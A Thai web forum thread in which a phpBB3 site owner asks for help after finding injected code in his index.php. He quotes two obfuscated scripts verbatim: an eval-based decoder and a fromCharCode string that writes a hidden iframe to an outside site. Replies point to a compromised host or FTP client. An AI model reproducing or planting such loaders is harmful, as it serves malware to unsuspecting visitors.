Virus หรือเปล่า ช่วยด้วยครับ!

ตอนเข้า Webboard(phpbb3) anti-virus มันเจอ Trojan-Downloader.JS.Agent.blv
URL: http://try-count.net/strong/184/?882500

แล้วหน้า Board ที่ผมจัดให้ให้อยู่ตรงกลางมันกลับมาขิดซ้ายซ่ะงั้น
ผมลองเข้าไปดูหน้า Index.php เจอเข้ากับ Code ตัวนี้อ่ะครับ

<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,115,116,117,100,105,111,97,114,116,55,46,110,101,116,47,50,50,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62));
<script>

ทั้งที่ไฟลต้นฉบับของผมมันไม่มี code ตัวนี้เลย
ผมลอง Login เข้าหน้า Admin ผลคือเหลือแต่ ข้อความและ link เท่านั้น รูปภาพต่างๆหายหมดเลย

ผู้รู้ช่วยหน่อยน่ะครับ
ขอบคุณครับ

อ่า…ไม่มีช่วยเลยอ่า… :sleep: :sleep:

หาก Post ผิดหัวข้อก็ต้องขออถัยด้วยน่ะครับ ผมมือใหม่ต้องขอโทษจริงๆ
แต่อยากให้ช้วยอย่างสุดใจเลยครับ

ตอนเข้า Webboard(phpbb3) anti-virus มันเจอ Trojan-Downloader.JS.Agent.blv
URL: http://try-count.net/strong/184/?882500

แล้วหน้า Board ที่ผมจัดให้ให้อยู่ตรงกลางมันกลับมาขิดซ้ายซ่ะงั้น
ผมลองเข้าไปดูหน้า Index.php เจอเข้ากับ Code ตัวนี้อ่ะครับ

ชุดที่1.


<script language=JavaScript>function uzban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,10,7,52,9,29,0,33,54,5,0,0,0,0,0,0,58,17,60,21,14,39,42,19,13,38,27,43,32,51,18,61,1,8,53,45,3,22,24,47,46,4,37,0,0,0,0,55,0,56,41,6,59,49,25,12,23,62,26,36,35,57,44,11,28,15,20,31,48,34,50,40,30,2,16);for(j=Math.ceil(l/b);j>0;j–){r=’’;for(i=Math.min(l,b);i>0;i–,l–){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(168^w&255);w>>=8;s-=2}else{s=6}}}eval®;}}uzban(‘s2negsB_cXH_4M5_JhmlnsneH0akgsBv5hpMcMS7sK5tp_gLqNftDK5v9_gucEpeHh4IxvpIQXS8ohbu6MH_Vom72X4t2WH_JJVtcdBe2vO7hiaLZEg_6Jw82_SegTVm4MHtcF5vcMBe9TVLyIfEj@4EPDalV@4MfiaLqFQus2gMpTpZfv4EQypMP0gtphfIV@4uJM53Y_pZ1vptJlHe42SkcsneHKwZrxVtDK5v9_nZqcQ’)</script>

ชุดที่2.


<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,115,116,117,100,105,111,97,114,116,55,46,110,101,116,47,50,50,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62));
<script>

ทั้งที่ไฟลต้นฉบับของผมมันไม่มี code ตัวนี้เลย
ผมลอง Login เข้าหน้า Admin ผลคือเหลือแต่ ข้อความและ link เท่านั้น รูปภาพต่างๆหายหมดเลย

ผู้รู้ช่วยหน่อยน่ะครับ
ขอบคุณครับ

ลบมันทิ้งเลยครับ

น่าจะเครื่อง server มีไวรัสครับ ต้องแจ้งให้เจ้าของเครื่องหรือผู้ให้บริการ จัดการครับ

ตอบไว้ในอีกกระทู้แล้ว เห็นตั้งหลายที่

หรืออาจจะเป็นเพราะโปรแกรม ftp ที่ใช้อัพโหลด
ควรหลีกเลี่ยงโปรแกรม ftp ที่แจกฟรี(แบบละเมิดลิขสิทธ์)บนอินเตอร์เนตนะครับ

ไม่ต้องโพสหลายห้องก็ได้ครับ เดี๋ยวก็มีคนมาตอบ ใจเย็นๆ

ขอบคุณครับ

[quote author=ICOM link=topic=11465.msg111524#msg111524 date=1211507815]
ไม่ต้องโพสหลายห้องก็ได้ครับ เดี๋ยวก็มีคนมาตอบ ใจเย็นๆ

เอ ผมไม่แน่ใจว่าปุ่มรวมกระทู้ (Merge Topics) ทุกท่านเห็นกันโดยปรกติหรือเปล่า
แต่ MOD เห็นน่ะครับ

วันนั้นคุณตั้งกระทู้ไว้ 2 ห้องผมเลยจับเอามารวมกันเป็นกระทู้นี้ กระทู้เดียว

ปล. ผม งง กับคำถามหรือว่า งง กับคำตอบตัวเองเนี่ย

[quote author=ICOM link=topic=11465.msg112592#msg112592 date=1211969386]

ปล. ผม งง กับคำถามหรือว่า งง กับคำตอบตัวเองเนี่ย

สรุปแล้ว ตอนนี้ผมยังไม่รู้เลยว่าจะแก้ไขยังไงดี และมันมาได้ยังไง
ตามลบ File และแก้ใหม่ มันก็กลับมาอีก หากมันมีชีวิต ผมจะด่ามันให้เสียชาติเลยจริงๆ

เอางี้ ปัญหาของคุณเป็นเฉพาะเวบคุณเวบเดียว หรือว่าเป็นทั้ง server

ถ้าตรวจในเครื่องแล้วมั่นใจว่าไม่มี ก็แสดงว่ามีอยู่ในโฮสนั่นล่ะครับ
ก็โทรไปแจ้งเขาให้จัดการซะ…เพราะถ้าไวรัสอยู่ในโฮส
คุณอัพไฟล์ใหม่ไปกี่รอบ มันก็ติดอยู่ดีครับ

:blush:

ผมมีอีก Web หนึ่งใช้ Hosting ที่เดียวกัน มันก็เป็นอาการเดียวกันเลย
และก่อนที่ผมจะ Upload File ต่างๆนั้น ผมจะ Scan Virus ทุกครั้ง ส่วนคอมผม ผมจะ Scan ทุกๆ 7 ใน Safemod ทุกอย่างก็ปกติดี
ผมยังมึนไม่หายเลย แต่ยังไงก็ดีใจน่ะครับ ที่มีพี่ๆหลายๆคนในนี้ คอยแสดงความคิดเห็นและเสนอแนะต่างๆ ขอบคุณจากใจจริงๆเลยครับ

แสดงว่าคุณ เช่าโฮสใช้งานอยู่
โทรแจ้งผู้ให้บริการของคุณ ตรวจสอบและแก้ไข ได้แล้วล่ะครับ
ปัญหาน่าจะมาจาก server ครับ

เออ ไม่ทราบใช้โปรแกรม FTP ตัวไหนครับ

ลองดู FTP log ถ้ามีการ download file และ upload file นั้นกลับทันที โดยที่เราไม่ได้ทำ Virus แน่นอน

ผมใช้ CuteFTP 8 Professional สำหรับ Uploaad ครับ
และวันนี้ผมโดนอีกแล้วครับ